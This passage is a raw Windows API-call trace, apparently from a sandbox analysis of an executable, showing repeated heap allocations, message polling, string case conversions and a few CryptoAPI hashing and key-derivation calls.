(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0260.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0260.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0260.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0260.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0260.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0260.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0260.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0260.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0260.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0260.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0260.189] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0260.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0260.189] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0260.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0260.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa068 [0260.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0260.190] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0260.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0260.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0260.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0260.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0260.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0260.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0260.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0260.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0260.190] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0260.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0260.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0260.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0260.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0260.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0260.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0260.191] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0260.191] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0260.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0260.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0260.191] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0260.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0260.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0260.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa830 [0260.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0260.191] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0260.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0260.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0260.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0260.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0260.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0260.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0260.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0260.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0260.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0260.192] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0260.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0260.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0260.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0260.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0260.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0260.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0260.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0260.192] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0260.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0260.192] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0260.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0260.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0260.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0260.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0260.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0260.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0260.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0260.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0260.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0260.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0260.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0260.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0260.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0260.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0260.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0260.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0260.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0260.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0260.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0260.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0260.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0260.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0260.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0260.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0260.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0260.194] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0260.194] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.194] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0260.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0260.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.194] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0260.195] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0260.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0260.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0260.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0260.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0260.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0260.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.195] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0260.195] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0260.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0260.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0260.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0260.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0260.196] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.196] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.196] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.196] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.196] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.196] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.196] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.196] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.196] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.197] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0260.197] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.197] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0260.197] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.197] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.197] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.197] CryptCreateHash (in: hProv=0xad31c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0260.197] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.197] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.197] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.198] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.198] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0260.198] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.198] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.198] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.198] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.198] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.198] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.198] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.198] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.198] CryptHashData (hHash=0xaa5960, pbData=0x34a2080, dwDataLen=0x3, dwFlags=0x1) returned 1 [0260.198] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.199] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.199] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.199] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.199] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.199] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.199] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.199] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.199] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0260.200] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.200] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0260.200] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.200] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.200] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.200] CryptDeriveKey (in: hProv=0xad31c0, Algid=0x6601, hBaseData=0xaa5960, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5860) returned 1 [0260.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0260.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0260.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0260.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0260.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0260.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0260.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0260.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0260.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0260.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0260.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0260.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0260.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0260.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0260.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0260.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0260.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0260.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0260.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0260.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0260.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0260.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0260.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0260.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0260.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0260.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0260.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0260.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0260.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0260.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0260.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0260.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0260.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0260.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0260.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0260.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0260.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0260.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0260.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0260.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0260.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0260.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0260.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0260.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0260.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 